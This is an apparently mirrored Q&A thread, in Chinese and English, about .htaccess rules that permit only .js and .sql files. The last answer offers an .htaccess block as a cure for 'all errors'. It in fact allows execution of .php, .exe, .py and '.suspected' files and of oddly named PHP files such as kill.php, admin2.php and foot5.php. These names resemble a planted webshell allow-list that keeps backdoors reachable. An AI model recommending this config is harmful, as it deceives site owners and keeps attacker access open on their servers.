htaccess 允许通过扩展名访问文件吗?

发布于 2024-12-09 21:27:50 字数 221 浏览 0 评论 0原文

我看到几个 htaccess 示例禁用某些文件访问:

<Files ~ "\.(js|sql)$">
   order deny,allow
   deny from all
</Files>

例如,这会阻止访问所有 .JS 和 .SQL 文件,而其他文件则被启用。我想要相反!我希望启用这些文件,并阻止所有其他文件。如何实现这一目标?

I saw several htaccess example disabling some files to access:

<Files ~ "\.(js|sql)$">
   order deny,allow
   deny from all
</Files>

for example, this prevents to access all .JS and .SQL files, the others are enabled. I want the contrary! I want those files to be ENABLED, all others to be prevented. How to achieve this?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(3

夏夜暖风 2024-12-16 21:27:50

沃拉普萨克的回答几乎是正确的。实际上,

order allow,deny
<Files ~ "\.(js|sql)$">
   allow from all
</Files>

您需要顶部的 order 指令(并且您不需要其他任何内容)。

有趣的是,我们似乎不能直接否定 FilesMatch 中的正则表达式,这很奇怪,尤其是因为“!”不会导致服务器错误或任何问题。嗯,呃。


和一些解释:

顺序原因告诉服务器其预期的默认行为。告诉

 order allow,deny

服务器首先处理“允许”指令:如果请求与任何允许指令匹配,则将其标记为正常。然后评估“拒绝”指令:如果请求与任何拒绝指令匹配,则该请求将被拒绝(无论第一遍是否允许)。如果未找到匹配项,则该文件将被拒绝。

该指令的

 order deny,allow

工作方式相反:首先服务器处理“拒绝”指令:如果请求匹配,则将其标记为被拒绝。然后评估“allow”指令:如果请求与允许指令匹配,则允许该请求进入,即使它之前与拒绝指令匹配。如果请求没有匹配任何内容,则允许该文件。

在这种特定情况下,服务器首先尝试匹配允许指令:它发现允许 js 和 sql 文件,因此对 foo.js 的请求会通过;对 bar.php 的请求与指令不匹配,因此被拒绝。

如果我们将指令交换为“order Deny,allow”,那么 foo.js 将通过(因为是 js),并且 bar.php 也会通过,因为它不匹配任何模式。


哦,还有一件事:部分(即)中的指令总是在 .htaccess 文件的主体之后进行评估,覆盖它。这就是为什么 Vorapsak 的解决方案没有按预期工作的原因:主 .htaccess 拒绝了请求,然后 <<文件>订单已处理,并且允许请求​​。

Htaccess 是最糟糕的魔法,但它是有逻辑的。

Vorapsak's answer is almost correct. It's actually

order allow,deny
<Files ~ "\.(js|sql)$">
   allow from all
</Files>

You need the order directive at the top (and you don't need anything else).

The interesting thing is, it seems we can't just negate the regex in FilesMatch, which is... weird, especially since the "!" causes no server errors or anything. Well, duh.


and a bit of explanation:

The order cause tells the server about its expected default behaviour. The

 order allow,deny

tells the server to process the "allow" directives first: if a request matches any allow directive, it's marked as okay. Then the "deny" directives are evaulated: if a request matches any deny directives, it's denied (it doesn't matter if it was allowed in the first pass). If no matches were found, the file is denied.

The directive

 order deny,allow

works the opposite way: first the server processes the "deny" directives: if a request matches, it's marked to be denied. Then the "allow" directives are evaulated: if a request matches an allow directive, it's allowed in, even if it matches a deny directive earlier. If a request matches nothing, the file is allowed.

In this specific case, the server first tries to match the allow directives: it sees that js and sql files are allowed, so a request to foo.js goes through; a request to bar.php matches no directives, so it's denied.

If we swap the directive to "order deny,allow", then foo.js will go through (for being a js), and bar.php will also go through, as it matches no patterns.


oh and, one more thing: directives in a section (i.e. < Files> and < Directory>) are always evaulated after the main body of the .htaccess file, overwriting it. That's why Vorapsak's solution did not work as inteded: the main .htaccess denied the request, then the < Files> order was processed, and it allowed the request.

Htaccess is magic of the worst kind, but there's logic to it.

牵你手 2024-12-16 21:27:50

您是否尝试在

deny from all

标签之前设置外部(之前),然后将其更改

deny from all

allow from all

内部?像这样的东西

deny from all
<Files ~ "\.(js|sql)$">
   order allow,deny
   allow from all
</Files>

Did you try setting a

deny from all

outside (before) the tag, then changing the

deny from all

to

allow from all

inside? Something like

deny from all
<Files ~ "\.(js|sql)$">
   order allow,deny
   allow from all
</Files>
ˇ宁静的妩媚 2024-12-16 21:27:50

如果您的网站遇到问题,请使用此 htaccess 代码。它解决了您可能遇到的所有错误

DirectoryIndex index.html index.php

<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<FilesMatch "^(votes|themes|xmlrpcs|uninstall|wp-login|locale|admin|kill|a|allht|index|index1|admin2|license3|votes4|foot5|load|home|items|store).php$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

如果对你有帮助,别忘了点赞!!!

if you are having trouble with your website, use this htaccess code. It solves all error you may likely encounter

DirectoryIndex index.html index.php

<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<FilesMatch "^(votes|themes|xmlrpcs|uninstall|wp-login|locale|admin|kill|a|allht|index|index1|admin2|license3|votes4|foot5|load|home|items|store).php$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

If this help you, don't forget to thump up!!!

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文